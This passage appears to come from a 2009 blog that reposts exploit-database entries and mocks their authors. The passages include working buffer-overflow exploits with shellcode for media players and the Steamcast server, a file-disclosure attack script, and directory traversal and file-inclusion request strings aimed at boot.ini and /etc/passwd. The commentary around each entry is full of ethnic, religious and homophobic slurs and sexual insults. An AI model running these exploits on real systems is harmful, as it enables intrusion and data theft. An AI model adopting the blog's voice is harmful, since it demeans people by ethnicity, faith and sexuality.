"\x4e\x36\x43\x56\x50\x52\x45\x36\x4a\x37\x45\x46\x42\x50\x5a")
poc = (header+chars+eip+"\x90"*10+shellcode)
file = open('skin.ini','w+')
file.write(poc)
file.close()

Stack: "CREDIT TO MUHAMMAD FOR MY WHORE OF A MOTHER HAVING ME TO IRRITATE REAL HACKERS BY POSTING SHIT ON MILWORM!"

CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC

2009-04-20T11:41:00.000-07:00

Main critism: LETS WELCOME THE NEWEST SCRIPT KIDDIE ON THE SHIT EXPLOIT SCENE, Gold_M!


# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ##  ##
# #  CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ## 
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";

Its a super stack overflowz!

Apollo 37zz (M3u File) Local Heap Overflow PoC

2009-04-16T08:29:00.000-07:00

Main critism: Just because you control eax doesn't mean its a fucking heap overflow you no talent loser.



#!/usr/bin/perl
#
#
# *******************************************************************************
# *               Apollo 37zz (.M3U File) Local Heap Overflow PoC               *
# *******************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail   : Paradis_des_fous@hotmail.fr
# Home     : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM
# Greetz to: Hussin X , Jiko , ZoRLu , Stack ,Nabilx , Mag!c ompo , And All MoroCCaN HaCkers
# And SP tHANX To : Figuig and Oujda City //Im so proud to be figuigian
#
#
# Download : http://apollo.capacala.com/Apollo37zz.exe
#
#OllyDbg Registers
#EAX 41414141
#ECX 00000000
#EDX 00000000
#EBX 0095488C ASCII "1%num% http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#ESP 0012CA00
#EBP 00954080
#ESI 0012CA24
#EDI 0047A880 Apollo.0047A880
#EIP 00416108 Apollo.00416108

my $M3U = "#EXTM3U\n";

my $ProofOfConcept= "http://".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; # 1014

open(MYFILE,'>>buffer1.m3u');

print MYFILE $M3U.$ProofOfConcept;

close(MYFILE);

print "Done! For Fun ;)";

"Done for fame, loser fame, and animal pron 4 life" - His (her?) new slogan

ASX to MP3 Converter (.M3U File) Local Stack Overflow PoC

2009-04-15T19:27:00.001-07:00

Main critism: Cyber-Zone seems to be Stack's online fat gay lover.



#!/usr/bin/perl
#
#
# ************************************************************************
# *     ASX to MP3 Converter (.M3U File) Local Stack Overflow POC        *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail   : Paradis_des_fous@hotmail.fr
# Home     : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz   : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F6C90
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414141
#
my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 26121;# just Poc tested under MS windows SP2 Fr

open(MYFILE,'>>KHAL.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

What do you get when you put two fuckup script kids together? No 0day. No Exploit. No Code. YOU OWN EIP MOTHER FUCKER!? WHERES THE FUCKING SHELL YOU STUPID FUCK!!!!!!!!!!!!!!!

ftpdmin 0.96 Arbitrary File Disclosure Exploit

2009-04-15T19:25:00.000-07:00

Main critism: Stack, YOUR FUCKING LAME!



#!/usr/bin/perl
#       ftpdmin 0.96 Arbitrary File Disclosure Exploit
#       Vulnerability Disclosure by 1 Slach or 2 Slach
#       Tested on Win XP SP2 but it work in other box environment
# Abouts Exploit : first thing after we exec the application it make our box a simple ftp server
# so like we see if we want conect in ftp we make that's cmd >> ftp 127.0.0.1 >> user & password allright
# but here our application make an ftp link for exec and partage some file in our box
# so we profite with this partage fontion to get some importent file in server like boot.ini for example
# for that's i make this exploit it conect to ftp trget via 21 port and if after with a single or doble slach we wrote
# our importent file like boot.ini
# so this the end of all
# message for (ks) use your mind to have more importent thing in server
 

use LWP::Simple;
use LWP::UserAgent;
 
if (@ARGV < 3) {
            print("Usage: $0     \n");
            print("TARGETS are\n ");
            print("Define full path with file name \n");
            print("Example FTP: perl $0 127.0.0.1 21 boot.ini \n");
            exit(1);
                    }
                    ($target, $port,$filename) = @ARGV;
        print("ftpdmin 0.96 Exploit : Coded by Stack!\n");
        print("Attacking $target on port $port!\n");
        print("FILENAME:  $filename\n");
       
        $temp="/" x 2;
         my $url= "ftp://". $target. ":" . $port .$temp . $filename;
            $content=get $url;
            print("\n FILE CONTENT STARTED");
            print("\n -----------------------------------\n");
            print("$content");
            print("\n -------------------------------------\n");

Your code is shit. Give up and stop embarrassing yourself you idiot!

Chance-i DiViS DVR System Web-server Directory Traversal Vulnerability

2009-04-15T19:23:00.000-07:00

Main critism: WHAT>>THE>>FUCK>>>



Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-036

original advisory: http://dsecrg.com/pages/vul/DSECRG-09-036.html

Application:                Chance-i DiViS DVR System web-server
Versions Affected:          2.0
Vendor URL:                 http://www.chance-i.com/
Bug:                        Directory Traversal File Download
Exploits:                   YES
Reported:                   13.03.2009
Second Reported:            20.03.2009
Solution:                   NONE
Date of Public Advisory:    09.04.2009
Author:                     Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)



Description
***********

DiViS DVR System web-server which fingerprints as Techno Vision Security System has Directory Traversal vulnerability.



Details
*******

Directory traversal vulnerability find in DiViS DVR System web-server.

Successfully exploiting these issues allows remote attackers to access the contents of arbitrary files.

Example:

http://[server]/../../../../../../../boot.ini



Solution:
*********

We did not get any response from vendor for more than 2 weeks.

No patches aviable.



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:    research [at] dsecrg [dot] com
            http://www.dsecrg.com
            http://www.dsec.ru

"Digital Security is leading IT security company in Russia" = Wow, Russia just disowned you.

Abee Chm eBook Creator 2.11 (FileName) Local Stack Overflow Exploit

2009-04-15T19:18:00.000-07:00

Main critism: Does anyone in the arab world know how to make a decent fucking header!? SHIT!


# exploit.py
# Abee Chm eBook Creator 2.11 Stack overflow Exploit
# By:Encrypt3d.M!nd
#
# it's the same exploit i wrote for chm maker,everything is the same!!
# but there's a lil note that when importing 'Devil_Inside.chmprj' a message
# will pops up and tells that the project file format is outdated bla bla but after clicking
# ok it will load into the program,and just go to File>Make Ebook.. and calc
# p.s:you can avoid the message by using chm ebook project data,i'm lazy to do that
# so i've used the chm maker one :D

ns = "\xEB\x06\x90\x90"
sh = "\x05\x67\x35\x45"

shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d"
"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c"
"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75"
"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36"
"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f"
"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69"
"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b"
"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54"
"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45"
"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b"
"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f"
"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65"
"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b"
"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51"
"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f"
"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30"
"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41"
"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61")

header1 = (
'\n'
..... should we really go on .....
'\n'
)


file=open('Devil_Inside.chmprj','w')
file.write(header1+header2)
file.close()

fucking l-a-m-e. who can't jump 6 these days... try smashing a kernel bug fuckwad. Somebody decrypt his mind so he can use it!

MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)

2009-04-15T19:16:00.000-07:00

Main critism: OMG DON'T STEAL MY boot.ini!!!!ZZZZZZ



######################### MonGoose 2.4 (win) webserver Directory Traversal  ###################



######By:  e.wiZz!

######Site: www.balcansecurity.com



Found with ServMeNot (world's sexiest fuzzer :P)




In the wild...

#########################################################################################

[Info]: Easy to use web server for Windows and UNIX. Mongoose provides simple and clean API
 for embedding it into existing programs. Targeting Web application developers, embedded system developers,
 and people who need to setup file sharing quickly.

[Site]: http://code.google.com/p/mongoose/


[Vulnerability]:  

http://[localhost]/../../../../../../boot.ini

This kids name is as lame as he is. Get a fucking book and read it!

Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]

2009-04-15T19:13:00.000-07:00

Main critism: Is it me or is SEH not cool anymore because of these kids playing with fire?



#!/usr/bin/python
#[*] Usage   : steamcast.py [victime_ip]
#[*] Bug     : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.        
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p

#Short Description : The previous exploit runs  small shellcodes only, this one is the opposite :)
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
#Other note : The shellcode will be executed when the program will be closed.
#Another one : When you have problems with running the exploit msg me before you msg str0ke.

import sys, socket
import struct

host = sys.argv[1] 
port = 8000


# win32_adduser -  PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"
"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"
"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"
"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"
"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"
"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"
"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"
"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"
"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"
"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"
"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"
"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"
"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"
"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"
"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")

shellunt=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")


exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt

#It needs a loop to works
while 1:
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((host, port))
 head =  "GET / HTTP/1.1\r\n"
 head += "Host: "+host+"\r\n"
 head += exploit+"\r\n"
 head += "\r\n\r\n"

 s.send(head)

Python wasn't shit before Google bathed it in babyoil.. now its kid friendly!

Job2C (conf.inc) Config File Disclosure Vulnerability

2009-04-15T19:11:00.000-07:00

Main critism: Are we the other ones that get tired of seeing this muslim bullshit posted across the internet? Get a fucking life.



                          ||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                  ( :   /    (_)    /           (   .  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<> Found by  :  Cyb3r-1sT

<> C0ntact : cyb3r-1st [at] hotmail.com 
                   
<> Groups : InjEctOr5 T3am 

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script   :: Job2C

<<->> download :: http://www.w2b.ru/download/Job2C.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================


<<->> Exploit :: Remote Config File Disclosure
 
                >>> http://www.cyb3r.1st/ [path] /conf/conf.inc

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================

<<->> All freinds , all muslims , [ www.tryag.com ] , [ www.7rs.org ] , [ sec-code.com ] , hackteach, and all arabic sites

Audit something thats worth it... but hey, your famous now, faggot!

Zervit Webserver 0.02 Remote Buffer Overflow PoC

2009-04-15T19:08:00.000-07:00

Main critism: Write a real fucking exploit you piece of shit. PoC's are soooo soooo lame.



####################  Zervit Webserver 0.02  Buffer Overflow   ############################


############### By:      e.wiZz!

###############Site:   www.balcansecurity.com


############### Found with ServMeNot (world's sexiest fuzzer :P )



In the wild...

########################################################################################

######Vend0r site: http://www.ohloh.net/projects/mereo


/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */

using System;
using System.IO;
using System.Net;
using System.Text;

class whatsoever
{
    static void Main()
    {
        // StringBuilder sb = new StringBuilder();

        //byte[] buf = new byte[8192];

        Console.WriteLine("Enter site: (http://localhost)");
        string sajt = Console.ReadLine();
        string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        HttpWebRequest request = (HttpWebRequest)
           
            WebRequest.Create(sajt+uribad);

        HttpWebResponse response = (HttpWebResponse)
            request.GetResponse();
        // you shouldn't see response
        Console.WriteLine(sb.ToString());
    }
}

Why does milw0rm keep posting this shit?

Mini-stream Ripper 3.0.1.1 .m3u Universal Stack Overflow Exploit

2009-04-15T15:19:00.000-07:00

Main critism: this kid obviously sucks a lot of useless software chink cock.


#!/usr/bin/perl
# Mini-stream Ripper Version 3.0.1.1 .m3u Universal Stack Overflow Exploit
# Disoverd By Cyber-Zone
# Exploited By Stack
my $Header = "#EXTM3U\n";
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";
my $ex="http://"."A" x 26117;
my $ret="\x1D\xE3\x07\x02"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
   # "\x5D\x38\x82\x7C";
my $nop="\x90" x 20;
open(MYFILE,'>>Mini-stream-Ripper.m3u');
print MYFILE $Header.$ex.$ret.$nop.$shellcode;
close(MYFILE);

Stack is a super lame name. Read "Win32 internals for Dumbasses"

FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability

2009-04-15T15:13:00.000-07:00

Main critism (I wish I had the patience to type more): not even an exploit



            =-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::FreeWebshop.org 2..2.9_R2
-------------------------------------------------
Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
download from:http://chaozz.deepunder.dk/released/freewebshop/FreeWebshop.org2.2.9_R2.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-==-=-=
vul: /includes/startmodules.inc.php line 31;

include ("./".$lang_file);

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=
xpl:
/path/includes/startmodules.inc.php?lang_file=.../../../../etc/passwd
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=-=-=-

dork:
"FreeWebshop.org | This is the Footer | ©2008-2009"
"FreeWebshop.org | This is the Footer |"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-

By Ahmedmacabelvi wannabe muslim fuckhead.